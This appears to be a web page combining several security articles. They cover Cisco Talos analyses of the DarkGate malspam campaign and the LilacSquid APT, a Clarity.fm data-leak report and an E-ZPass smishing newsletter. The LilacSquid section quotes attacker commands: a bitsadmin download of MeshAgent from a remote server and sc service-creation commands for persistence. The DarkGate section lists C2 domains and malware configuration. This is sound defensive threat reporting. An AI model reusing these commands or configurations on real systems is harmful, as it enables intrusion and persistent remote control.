This post was authored by Kalpesh Mantri. 

Cisco Talos is actively tracking a recent increase in activity from malicious email campaigns containing a suspicious Microsoft Excel attachment that, when opened, infected the victim's system with the DarkGate malware. 
These campaigns, active since the second week of

Wednesday, June 5, 2024 08:00

_This post was authored by Kalpesh Mantri._ 

*   Cisco Talos is actively tracking a recent increase in activity from malicious email campaigns containing a suspicious Microsoft Excel attachment that, when opened, infected the victim's system with the DarkGate malware. 
*   These campaigns, active since the second week of March, leverage tactics, techniques, and procedures (TTPs) that we have not previously observed in DarkGate attacks. 
*   These campaigns rely on a technique called “Remote Template Injection” to bypass email security controls and to deceive the user into downloading and executing malicious code when the Excel document is opened.  
*   DarkGate has used AutoIT scripts as part of the infection process for a long time. However, in these campaigns, AutoHotKey scripting was used instead of AutoIT.  
*   The final DarkGate payload is designed to execute in-memory, without ever being written to disk, running directly from within the AutoHotKey.exe process. 

The DarkGate malware family is distinguished by its covert spreading techniques, ability to steal information, evasion strategies, and widespread impact on both individuals and organizations. Recently, DarkGate has been observed distributing malware through Microsoft Teams and even via malvertising campaigns. Notably, in the latest campaign, AutoHotKey scripting was employed instead of AutoIT, indicating the continuous evolution of DarkGate actors in altering the infection chain to evade detection. 

**Email campaigns **

This research began when a considerable number of our clients reported receiving emails, each containing a Microsoft Excel file attachment that followed a distinct pattern in its naming convention. 

Talos’ intent analysis of these emails revealed that the primary purpose of the emails primarily pertained to financial or official matters, compelling the recipient to take an action by opening the attached document. 

This peculiar trend prompted us to conduct an in-depth investigation into this widespread malspam activity. Our initial findings linked the indicators of compromise (IOCs) to the DarkGate malware.  

The table below includes some of the observed changes in attachment naming convention patterns over time.  

End Date 

Format 

Examples 

March 12, 2024 

March 19, 2024 

march-D%-2024.xlsx 

march-D5676-2024.xlsx 

march-D3230-2024.xlsx 

march-D2091-2024.xlsx 

March 15, 2024 

March 20, 2024 

ACH-%March.xlsx 

ACH-5101-15March.xlsx 

ACH-5392-15March.xlsx 

ACH-4619-15March.xlsx 

March 18, 2024 

March 19, 2024 

attach#%-2024.xlsx 

attach#4919-18-03-2024.xlsx 

attach#8517-18-03-2024.xlsx 

attach#4339-18-03-2024.xlsx 

March 19, 2024 

March 20, 2024 

march19-D%-2024.xlsx 

march19-D3175-2024.xlsx 

march19-D5648-2024.xlsx 

march19-D8858-2024.xlsx 

March 26, 2024 

March 26, 2024 

re-march-26-2024-%.xls? 

re-march-26-2024-4187.xlsx 

re-march-26-2024-7964.xlsx 

re-march-26-2024-4187.xls 

April 3, 2024 

April 5, 2024 

april2024-%.xlsx 

april2024-2032.xlsx 

april2024-3378.xlsx 

april2024-4268.xlsx 

April 9, 2024 

April 9, 2024 

statapril2024-%.xlsx 

statapril2024-9505.xlsx 

statapril2024-9518.xlsx 

statapril2024-9524.xlsx 

April 10, 2024 

April 10, 2024 

4\_10\_AC-%.xlsx\* 

4\_10\_AC-1177.xlsx 

4\_10\_AC-1288.xlsx 

4\_10\_AC-1301.xlsx 

_\*Variant redirecting to JavaScript file instead of VBS._ 

**Victimology **

Based on Cisco Talos telemetry, this campaign targets the U.S. the most often compared to other geographic regions.

Healthcare technologies and telecommunications were the most-targeted sectors, but campaign activity was observed targeting a wide range of industries. 

**Technical analysis **

Our telemetry indicates that malspam emails were the primary source of delivery for this campaign. It is an active campaign using attached Excel documents attempting to lure users to download and execute remote payloads.  

As shown below, the Excel spreadsheet has an embedded object with an external link to an attacker-controlled Server Message Block (SMB) file share. 

The overall infection process associated with this campaign is shown below. 

The infection process begins when the malicious Excel document is opened. These files were specially crafted to utilize a technique, called “Remote Template Injection,” to trigger the automatic download and execution of malicious contents hosted on a remote server. 

Remote Template Injection is an attack technique that exploits a legitimate Excel functionality wherein templates can be imported from external sources to expand a document’s functions and features. By exploiting the inherent trust users place in document files, this method skilfully evades security protocols that may not be as stringent for document templates compared to executable files. It represents a refined tactic for attackers to establish a presence within a system, sidestepping the need for conventional executable malware.  

When the Excel file is opened, it downloads and executes a VBS file from an attacker-controlled server. 

The VBS file is appended with a command that executes a PowerShell script from the DarkGate command and control (C2) server. 

This PowerShell script retrieves the next stage’s components and executes them, as shown below. 

**Payload analysis **

On March 12, 2024, the DarkGate campaign transitioned from deploying AutoIT scripts to employing AutoHotKey scripts. 

AutoIT and AutoHotKey are scripting languages designed for automating tasks on Windows. While both languages serve similar purposes, their differences lie in their syntax complexity, feature sets and community resources. AutoHotKey offers more advanced text manipulation features, extensive support for hotkeys, and a vast library of user-contributed scripts for various purposes. While both AutoIT and AutoHotKey have legitimate purposes, they are often abused by adversaries to run malicious scripts, consistent with other scripting languages often observed in infection chains. 

As shown in the screenshot above, one of the files retrieved is ‘test.txt.’ Within this file, there is base64-encoded blob that, when decoded, transforms into binary data. This binary data is then processed to execute the DarkGate malware payload directly within memory on infected systems. 

As shown in the previous PowerShell code, payloads are initially saved to disk within a directory (C:\\rimz\\) on the system. The directory name changes across infection chains that were analyzed. 

In this case, the attacker was using a legitimate copy of the AutoHotKey binary (AutoHotKey.exe) to execute a malicious AHK script (script.ahk). 

The executed AHK script reads content from the text file (test.txt), decodes it in memory, and executes it without ever saving the decoded DarkGate payload to disk. This file also contains shellcode that is loaded and executed by the AHK script, as shown below. 

**Persistence mechanisms **

Components used during the final stage of the infection process are stored at the following directory location: 

*   C:\\ProgramData\\cccddcb\\AutoHotKey.exe 
*   C:\\ProgramData\\cccddcb\\hafbccc.ahk 
*   C:\\ProgramData\\cccddcb\\test.txt 

Persistence across reboots is established through the creation of a shortcut file within the Startup directory on the infected system. 

C:\\Users\\<USERNAME>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\DfAchhd.lnk 

C:\\ProgramData\\cccddcb\\AutoHotkey.exe  C:\\ProgramData\\cccddcb"C:\\ProgramData\\cccddcb\\hafbccc.ahk 

Talos’ threat intelligence and detection response teams have successfully developed detection for these campaigns and blocked them as appropriate on Cisco Secure products. However, because of the evolving nature of recent DarkGate campaigns — as demonstrated by the shift from AutoIT to AutoHotKey scripts and use of remote template injection — serves as a stark reminder of the continuous arms race in cybersecurity. 

**Coverage **

 Ways our customers can detect and block this threat are listed below.  

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The following Snort SIDs apply to this threat:  

*   **Snort 2 SIDs:** 3, 12, 11192, 13667, 15306, 16642, 19187, 23256, 23861, 44484, 44485, 44486, 44487, 44488, 63521, 63522, 63523, 63524 
*   **Snort 3 SIDs:** 1, 16, 260, 11192, 15306, 36376, 44484, 44486, 44488, 63521, 63522, 63523, 63524 

The following ClamAV detections are also available for this threat:  

*   Doc.Malware.DarkGateDoc 
*   Ps1.Malware.DarkGate-10030456-0 
*   Vbs.Malware.DarkGate-10030520-0 

**Indicators of Compromise (IOCs) **

Indicators of Compromise (IOCs) associated with this threat can be found here.  

Below is an example of the configuration parameters extracted from one of the DarkGate payloads analyzed.  

hxxp://badbutperfect\[.\]com 

hxxp://withupdate\[.\]com 

hxxp://irreceiver\[.\]com 

hxxp://backupitfirst\[.\]com 

hxxp://goingupdate\[.\]com 

hxxp://buassinnndm\[.\]net 

anti\_analysis = true 

anti\_debug = false 

anti\_vm = true 

c2\_port = 80 

internal\_mutex (Provides the XOR key/maker used for DarkGate payload decryption) = WZqqpfdY 

ping\_interval = 60 

startup\_persistence = true 

username = admin

DarkGate switches up its tactics with new payload, email templates

Since February 2024, Cisco Talos has been observing an active campaign targeting Brazilian users with a new banking trojan called “CarnavalHeist.” Many of the observed tactics, techniques and procedures (TTPs) are common among other banking trojans coming out of Brazil.

New banking trojan “CarnavalHeist” targets Brazil with overlay attacks

By Waqas
A data leak incident involving Clarity.fm left the personal data of business leaders and celebrities exposed to public…
This is a post from HackRead.com Read the original post: Data Leak Exposes Business Leaders and Top Celebrity Data

A data leak incident involving Clarity.fm left the personal data of business leaders and celebrities exposed to public access. Learn the details of the leak, the potential consequences, and how to protect yourself from the aftermath of a data leak.

A recent data leak involving the San Francisco-based firm Clarity.fm, a platform connecting entrepreneurs with industry experts, left sensitive and personal information about business leaders and celebrities exposed to public access without any security authentication.

Founded in 2012, Clarity.fm prides itself on facilitating on-demand consultations between entrepreneurs and established professionals, boasting over 3,000 experts and having Mark Cuban, Brad Feld, and Eric Ries as clients. 

However, cybersecurity researcher Jeremiah Fowler discovered a non-password-protected database containing an estimated 155,531 records and 121,000 member accounts of entrepreneurs, top celebrities and business leaders. The records included a trove of information including the following:

*   **Full names**
*   **Phone numbers**
*   **Email addresses**
*   **Consultation content**
*   **Hourly consultation rates**
*   **Payment records related to previous consulting sessions**

_and more…_

The leaked data (Screenshot provided by Jeremiah Fowler – Website Planet

“The profiles showed personal and professional email addresses, hourly rates, past consulting sessions’ payments, and their internal rating or score (based on user feedback). The records were marked as production data, and indicated if the person was a member, leader, or mentor,” Fowler wrote in his blog post on WebsitePlanet. 

Business leaders and celebrities entrusted Clarity.fm with sensitive details. These individuals may have sought guidance on critical matters related to their businesses or careers.

Therefore, this leak raises serious concerns about data security and the potential consequences for its high-profile clients as with the data exposed, they face an elevated risk of being targeted by cybercriminals. 

This information could be a goldmine for malicious actors seeking to launch targeted scams, phishing attacks, and blackmail attempts. They may also target cloud storage infrastructure, exploit vulnerabilities, or use social engineering techniques for credential theft.

The use of artificial intelligence in phishing campaigns has made it easier to deceive recipients into providing personal or business information. Voice-cloning AI can also be used to gain trust and obtain unauthorized access to sensitive accounts.

Fowler promptly sent a responsible disclosure notice and secured the database, but it’s unclear how long it was exposed or if anyone else gained access. An internal forensic audit could identify the information.

It’s also unclear if the database was owned by Clarity.fm or a third-party contractor. Still, Fowler believes Clarity.fm, its partners and affiliates were not directly responsible for the leak.

Platforms handling sensitive user information must ensure proper cybersecurity measures, including regular data encryption, secure storage practices, and user authentication protocols. Businesses and individuals should be mindful of the data they share online, sharing only the minimum amount to mitigate risks.

1.  Z2U Market Leak Exposes Access to Illicit Services
2.  Major UK Security Provider Leaks Trove of Guard, Suspect Data
3.  Watch out: Fake celebrity endorsements advertising Bitcoin scam
4.  Data Leak Exposes 500GB of Indian Police, Military Biometric Data
5.  Mastermind of 2020’s top celebrity Twitter hack sentenced to 3 years

Data Leak Exposes Business Leaders and Top Celebrity Data

Drivers from New York to Georgia and Pennsylvania have received these types of texts with equally convincing phishing text messages and lure pages.

Thursday, May 30, 2024 14:00

My wife (no stranger to weird types of scams) recently received a fake text message from someone claiming to be New Jersey’s E-ZPass program saying that she had an outstanding balance from highway tolls that she owed, prompting her to visit a site so she could pay and avoid additional fines. 

There was plenty of reason to believe this was a legitimate ask. Her family is from New Jersey, so we make frequent trips there, paying $20-plus in tolls along the way. We had also just completed a trip from there a few weeks prior (though I’m not sure if this was a coincidence to the timing of the spam text or not), and we both have E-ZPass accounts. 

For the uninitiated, or anyone who lives in a country where taxes are paid as normal and therefore pay for appropriate road repairs, E-ZPass is a small device drivers in more than a dozen countries in the U.S. can register for so they can automatically pay tolls along highways rather than having to stop and use cash or coins, or spending a few extra minutes manually processing a transaction.  

Each state or city has its own agencies that deal with E-ZPass, each with its own payment processing system and website. For this case with New Jersey, the phishing site the scammers set up was shockingly convincing and looked remarkably similar to the legitimate New Jersey E-ZPass website.  

The phishing website set up by scammers (left) meant to look like the legitimate New Jersey E-ZPass website (right).

Once we logged into our legitimate E-ZPass account to check to make sure we had, in fact, paid all the appropriate tolls, I alerted my team about this scam, and we appropriately blocked the phishing URL in question in Cisco Secure products.  

Since this victory and foray into threat hunting, I have learned that this is a problem everywhere, not just for New Jersey drivers. 

Since this experience, E-ZPass has sent out an alert in all the states they operate in warning about these types of scams. Drivers from New York to Georgia and Pennsylvania have received these types of texts with equally convincing phishing text messages and lure pages.  

It’s unclear what the adversaries’ goals are in this case, but it’s probably safe to assume they’re looking to collect users’ credit card information after they go in to pay the alleged overdue toll. They could also be collecting E-ZPass login information to collect further data about the drivers. 

In April, the FBI also warned of SMS phishing scams, in which adversaries pretended to be toll collection services from three different U.S. states. SunPass, the equivalent to E-ZPass in Florida, also alerted about similar scams around the same time as these E-ZPass scams started being reported. And in March, the FasTrak service in California warned of the same problems.  

My hunch is that these types of services are being impersonated all over the U.S. for several reasons — thousands of drivers use these services (especially in states with a high commuter population), which makes it likely that whoever receives the text will be familiar with these devices and will have recently driven on a highway that makes drivers pay tolls. The amounts they’re asking for are also small, no more than $5 USD, so it doesn’t set off any immediate alarm bells, unlike similar scams that ask for hundreds of dollars for health care services. The requests coming through as SMS messages also make the targets more likely to open them on their mobile devices, which may not have the same security in place as a laptop or managed company device. 

No individual state or local agency is immune from this style of scam, so if you’re ever in doubt of receiving a text like this, it’s best to call your area government program in question and ask them about any suspicious activity before clicking on any links or submitting payment information. 

**The one big thing **

Cisco Talos’ Vulnerability Research team has helped to disclose and patch more than 20 vulnerabilities over the past three weeks, including two in the popular Adobe Acrobat Reader software. Acrobat, one of the most popular PDF readers currently available, contains two out-of-bounds read vulnerabilities that could lead to the exposure of sensitive contents of arbitrary memory in the application. There are also eight vulnerabilities in a popular line of PLC CPU modules commonly used in automated environments. We have more detailed information in our full Vulnerability Roundup from this week. 

**Why do I care? **

Several vulnerabilities were identified in the AutomationDirect P3 line of CPU modules. The P3-550E is the most recent CPU module released in the Productivity3000 line of Programmable Automation Controllers from AutomationDirect. The device communicates remotely via ethernet, serial and USB and exposes a variety of control services, including MQTT, Modbus, ENIP and the engineering workstation protocol DirectNET. Four of the vulnerabilities found in these PLC CPU modules received a CVSS security score of 9.8 out of 10, making them particularly notable. TALOS-2024-1942 (CVE-2024-21785) is a leftover debug code vulnerability that allow an adversary who can communicate to the device over ModbusRTU to enable the device’s diagnostic interface without any other knowledge of the target device. There is also TALOS-2024-1943 (CVE-2024-23601) which can lead to remote code execution if the attacker sends a specially crafted file to the targeted device and TALOS-2024-1939 (CVE-2024-24963 and CVE-2024-24962) which are stack-based buffer overflows that can also lead to remote code execution if the attacker sends a specially formatted packet to the device. 

**So now what? **

Each of the vendors mentioned in this week’s Vulnerability Roundup have released patches for affected products, and users should download these patches as soon as possible. For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website. 

**Top security headlines of the week **

**Security researchers are warning about the dangers of a new AI “Recall” feature for Microsoft Windows 11.** Microsoft recently announced a new update, that will allow a computer to remember past actions taken by the user and then use a simple search to query that information (ex., “Where did I store that document again?”). However, because Recall essentially takes individual snapshots of a machine and stores them locally, there are several security concerns. If an adversary were to infect a targeted machine with information-stealing malware, they could steal important databases stored locally and anything stored by Windows Recall. Recall also contains what are essentially keylogging functions, leaving the door open for adversaries to easily steal login credentials or other personal information that had been entered into the machine over the previous three months. The United Kingdom’s data protection agency has already contacted Microsoft inquiring about the way this information is stored and used, and they’ve asked for assurance that users’ data will be properly safeguarded and not used by the company.  Other unauthorized users may be able to access and query Recall’s information, should they obtain physical access to the device. (Bleeping Computer, Double Pulsar) 

**Popular spyware app pcTattletale had to completely shut down after a data breach and having its website seized.** The company that operates the app, which quietly and remotely tracks users’ activities on infected machines and takes screenshots, had its website defaced earlier this week by a hacker, along with a dump of data belonging to alleged pcTattletale customers and victims. Just days before the disruption, reports surfaced that the software was quietly installed on computers that handled the check-in process at least three Wyndham hotels across the U.S. A vulnerability in the platform could have allowed anyone on the internet who exploits it can download screenshots captured by the software directly from its servers. pcTattletale advertised itself as software that could allow anyone to control it remotely and view the target’s Android or Windows devices and their data from anywhere in the world. The founder of the spyware said that, after the data breach, the company was “out of business and completely done.” The now-defunct app had 138,000 registered customers, according to data breach notification website Have I Been Pwned. (TechCrunch, TechCrunch (again)) 

**Ascension hospitals across the U.S. still have to delay patient care more than three weeks after a cyber attack.** As of earlier this week, the national hospital system is still experiencing network disruptions, forcing staff to write care notes by hand and deliver orders for tests and prescriptions in person. Patients have also been unable to use their online portals to contact their doctors or view their medical records. Ascension is one of the largest health systems in the U.S., with more than 140 hospitals across the country. It first alerted patients and doctors about “unusual activity” on May 8, and there is no timeline for when services will be fully restored. News reports indicate that the disruption is a ransomware attack that can be attributed to the BlackBasta threat actor, which has links to Russia. Large health care organizations have increasingly become the target of ransomware attacks, with a previous campaign targeting Change Healthcare earlier this year disrupting payments to medical providers across the U.S. for weeks. (NPR, The New York Times) 

**Can’t get enough Talos? **

*   Attackers are probing Check Point Remote Access VPN devices 
*   Out-of-bounds reads in Adobe Acrobat; Foxit PDF Reader contains vulnerability that could lead to SYSTEM-level privileges 
*   New Generative AI category added to Talos reputation services 
*   From trust to trickery: Brand impersonation over the email attack vector 

**Upcoming events where you can find Talos **

**Cisco Live** **(June 2 - 6)** 

_Las Vegas, Nevada_ 

> _B_ill Largent from Talos' Strategic Communications team will be giving our annual "State of Cybersecurity" talk at Cisco Live on Tuesday, June 4 at 11 a.m. Pacific time. Jaeson Schultz from Talos Outreach will have a talk of his own on Thursday, June 6 at 8:30 a.m. Pacific, and there will be several Talos IR-specific lightning talks at the Cisco Secure booth throughout the conference.

**_AREA41_** **_(June 6 – 7)_** 

_Zurich, Switzerland_ 

> _Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches._ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202   
**MD5:** e4acf0e303e9f1371f029e013f902262   
**Typical Filename:** FileZilla\_3.67.0\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.Application.27hg.1201 

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0   
**MD5:** b4440eea7367c3fb04a89225df4022a6   
**Typical Filename:** Pdfixers.exe   
**Claimed Product:** Pdfixers   
**Detection Name:** W32.Superfluss:PUPgenPUP.27gq.1201 

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0    
**MD5:** 8c69830a50fb85d8a794fa46643493b2    
**Typical Filename:** AAct.exe    
**Claimed Product:** N/A     
**Detection Name:** PUA.Win.Dropper.Generic::1201 

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c       
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c       
**Typical Filename:** AAct.exe       
**Claimed Product:** N/A         
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

Attackers are impersonating a road toll payment processor across the U.S. in phishing attacks

Multiple TTPs utilized in this campaign bear some overlap with North Korean APT groups.

Thursday, May 30, 2024 08:01

_By Anna Bennett, Nicole Hoffman, Asheer Malhotra, Sean Taylor and Brandon White._ 

*   Cisco Talos is disclosing a new suspected data theft campaign, active since at least 2021, we attribute to an advanced persistent threat actor (APT) we’re calling “LilacSquid.”  
*   LilacSquid’s victimology includes a diverse set of victims consisting of information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe and the pharmaceutical sector in Asia indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources.  
*   This campaign uses MeshAgent, an open-source remote management tool, and a customized version of QuasarRAT we’re calling “PurpleInk” to serve as the primary implants after successfully compromising vulnerable application servers exposed to the internet.  
*   This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader.”  
*   The campaign is geared toward establishing long-term access to compromised victim organizations to enable LilacSquid to siphon data of interest to attacker-controlled servers. 

**LilacSquid – An espionage-motivated threat actor **

Talos assesses with high confidence that this campaign has been active since at least 2021 and the successful compromise and post-compromise activities are geared toward establishing long-term access for data theft by an advanced persistent threat (APT) actor we are tracking as "LilacSquid" and UAT-4820. Talos has observed at least three successful compromises spanning entities in Asia, Europe and the United States consisting of industry verticals such as pharmaceuticals, oil and gas, and technology. 

Previous intrusions into software manufacturers, such as the 3CX and X\_Trader compromises by Lazarus, indicate that unauthorized long-term access to organizations that manufacture and distribute popular software for enterprise and industrial organizations can open avenues of supply chain compromise proving advantageous to threat actors such as LilacSquid, allowing them to widen their net of targets.  

We have observed two different types of initial access techniques deployed by LilacSquid, including exploiting vulnerabilities and the use of compromised remote desktop protocol (RDP) credentials. Post-exploitation activity in this campaign consists of the deployment of MeshAgent, an open-source remote management and desktop session application, and a heavily customized version of QuasarRAT that we track as “PurpleInk” allowing LilacSquid to gain complete control over the infected systems. Additional means of persistence used by LilacSquid include the use of open-source tools such as Secure Socket Funneling (SSF), which is a tool for proxying and tunneling multiple sockets through a single secure TLS tunnel to a remote computer. 

It is worth noting that multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus. Public reporting has noted Andariel’s use of MeshAgent as a tool for maintaining post-compromise access after successful exploitation. Furthermore, Talos has observed Lazarus extensively use SOCKs proxy and tunneling tools, along with custom-made malware as part of their post-compromise playbooks to act as channels of secondary access and exfiltration. This tactic has also been seen in this campaign operated by LilacSquid where the threat actor deployed SSF along with other malware to create tunnels to their remote servers. 

**LilacSquid’s infection chains **

There are primarily two types of infection chains that LilacSquid uses in this campaign. The first involves the successful exploitation of a vulnerable web application, while the other is the use of compromised RDP credentials. Successful compromise of a system leads to LilacSquid deploying multiple vehicles of access onto compromised hosts, including dual-use tools such as MeshAgent, Secure Socket Funneling (SSF), InkLoader and PurpleInk. 

Successful exploitation of the vulnerable application results in the attackers deploying a script that will set up working directories for the malware and then download and execute MeshAgent from a remote server. On execution, MeshAgent will connect to its C2, carry out preliminary reconnaissance and begin downloading and activating other implants on the system, such as SSF and PurpleInk. 

MeshAgent is typically downloaded by the attackers using the bitsadmin utility and then executed to establish contact with the C2: 

bitsadmin /transfer -job\_name- /download /priority normal -remote\_URL- -local\_path\_for\_MeshAgent-  -local\_path\_for\_MeshAgent- connect 

**Instrumenting InkLoader – Modularizing the infection chain **

When compromised RDP credentials were used to gain access, the infection chain was altered slightly. LilacSquid chose to either deploy MeshAgent and subsequent implants, or introduce another component in the infection preceding PurpleInk.  

InkLoader is a simple, yet effective DOT NET-based malware loader. It is written to run a hardcoded executable or command. In this infection chain, InkLoader is the component that persists across reboots on the infected host instead of the actual malware it runs. So far, we have only seen PurpleInk being executed via InkLoader, but LilacSquid may likely use InkLoader to deploy additional malware implants. 

Talos observed LilacSquid deploy InkLoader in conjunction with PurpleInk only when they could successfully create and maintain remote sessions via remote desktop (RDP) by exploiting the use of stolen credentials to the target host. A successful login via RDP leads to the download of InkLoader and PurpleInk, copying these artifacts into desired directories on disk and the subsequent registration of InkLoader as a service that is then started to deploy InkLoader and, in turn, PurpleInk. The infection chain can be visualized as: 

Service creation and execution on the endpoint is typically done via the command line interface using the commands: 

sc create TransactExDetect displayname=Extended Transaction Detection binPath= \_filepath\_of\_InkLoader\_ start= auto 
sc description TransactExDetect Extended Transaction Detection for Active Directory domain hosts 
sc start TransactExDetect 

**PurpleInk – LilacSquid's bespoke implant **

PurpleInk, LilacSquid’s primary implant of choice, has been adapted from QuasarRAT, a popular remote access trojan family. Although QuasarRAT has been available to threat actors since at least 2014, we observed PurpleInk being actively developed starting in 2021 and continuing to evolve its functionalities separate from its parent malware family.  

PurpleInk uses an accompanying configuration file to obtain information such as the C2 server’s address and port. This file is typically base64-decoded and decrypted to obtain the configuration strings required by PurpleInk. 

PurpleInk is a highly versatile implant that is heavily obfuscated and contains a variety of RAT capabilities. Talos has observed multiple variants of PurpleInk where functionalities have both been introduced and removed. 

In terms of RAT capabilities, PurpleInk can perform the following actions on the infected host: 

*   Enumerate the process and send the process ID, name and associated Window Title to the C2. 
*   Terminate a process ID (PID) specified by the C2 on the infected host. 
*   Run a new application on the host – start process. 
*   Get drive information for the infected host, such as volume labels, root directory names, drive type and drive format. 
*   Enumerate a given directory to obtain underlying directory names, file names and file sizes. 
*   Read a file specified by the C2 and exfiltrate its contents. 
*   Replace or append content to a specified file. 

*   Gather system information about the infected host using WMI queries. Information includes:  

Information retrieved 

WMI query and output used 

Processor name 

SELECT \* FROM Win32\_Processor 

Memory (RAM) size in MB 

Select \* From Win32\_ComputerSystem | TotalPhysicalMemory 

Video Card (GPU) 

SELECT \* FROM Win32\_DisplayConfiguration | Description 

Username 

Current username 

Computer name 

Infected host’s name 

Domain name 

Domain of the infected host 

Host name 

NetBIOS Host name 

System drive 

Root system drive 

System directory 

System directory of the infected host 

Computer uptime 

Calculate uptime from current time and SELECT \* FROM Win32\_OperatingSystem WHERE Primary='true' | LastBootUpTime 

MAC address 

By enumerating Network interfaces on the endpoint 

LAN IP address 

By enumerating Network interfaces on the endpoint 

WAN IP address 

None – not retrieved or calculated – empty string sent to C2. 

Antivirus software name 

Not calculated – defaults to “NoInfo” 

Firewall 

Not calculated – defaults to “NoInfo” 

Time zone 

Not calculated – an empty string is sent to the C2. 

Country 

Not calculated – an empty string is sent to the C2. 

ISP 

Not calculated – an empty string is sent to the C2. 

*   Start a remote shell on the infected host using ‘ cmd\[.\]exe /K ’. 
*   Rename or move directories and files and then enumerate them. 
*   Delete files and directories specified by the C2. 
*   Connect to a specified remote address, specified by the C2. This remote address referenced as “Friend” internally is the reverse proxy host indicating that PurpleInk can act as an intermediate proxy tool. 

PurpleInk has the following capabilities related to communicating with its “friends” (proxy servers): 

*   Connect to a _new_ friend whose remote address is specified by the C2. 
*   Send data to a new or existing friend. 
*   Disconnect from a specified friend. 
*   Receive data from another connected friend and process it. 

Another PurpleInk variant, built and deployed in 2023 and 2024, consists of limited functionalities, with much of its capabilities stripped out. The capabilities that still reside in this variant are the abilities to: 

*   Close all connections to proxy servers. 
*   Create a reverse shell.  
*   Connect and send/receive data from connected proxies. 

Functionalities, such as file management, execution and gathering system information, have been stripped out of this variant of PurpleInk, but can be supplemented by the reverse shell carried over from previous variants, which can be used to carry out these tasks on the infected endpoint. Adversaries frequently strip, add and stitch together functionalities to reduce their implant’s footprint on the infected system to avoid detection or to improve their implementations to remove redundant capabilities.  

**InkBox – Custom loader observed in older attacks **

InkBox is a malware loader that will read from a hardcoded file path on disk and decrypt its contents. The decrypted content is another executable assembly that is then run by invoking its Entry Point within the InkBox process. This second assembly is the backdoor PurpleInk. The overall infection chain in this case is: 

The usage of InkBox to deploy PurpleInk is an older technique used by LilacSquid since 2021. Since 2023, the threat actor has produced another variant of the infection chain where they have modularized the infection chain so that PurpleInk can now run as a separate process. However, even in this new infection chain, PurpleInk is still run via another component that we call "InkLoader.”  

**LilacSquid employs MeshAgent **

In this campaign, LilacSquid has extensively used MeshAgent as the first stage of their post-compromise activity. MeshAgent is the agent/client from the MeshCentral, an open-source remote device management software. The MeshAgent binaries typically use a configuration file, known as an MSH file. The MSH files in this campaign contain information such as MeshName (victim identifier in this case) and C2 addresses: 

MeshName=-Name\_of\_mesh- 
MeshType=-Type\_of\_mesh- 
MeshID=0x-Mesh\_ID\_hex- 
ServerID=-Server\_ID\_hex- 
MeshServer=wss://-Mesh\_C2\_Address-
Translation=-keywords\_translation\_JSON-

Being a remote device management utility, MeshAgent allows an operator to control almost all aspects of the device via the MeshCentral server, providing capabilities such as: 

*   List all devices in the Mesh (list of victims). 
*   View and control desktop. 
*   Manage files on the system. 
*   View software and hardware information about the device.  

Post-exploitation, MeshAgent activates other dual-use and malicious tools on the infected systems, such as SSF and PurpleInk.  

**Coverage **

Ways our customers can detect and block this threat are listed below. 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.   

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

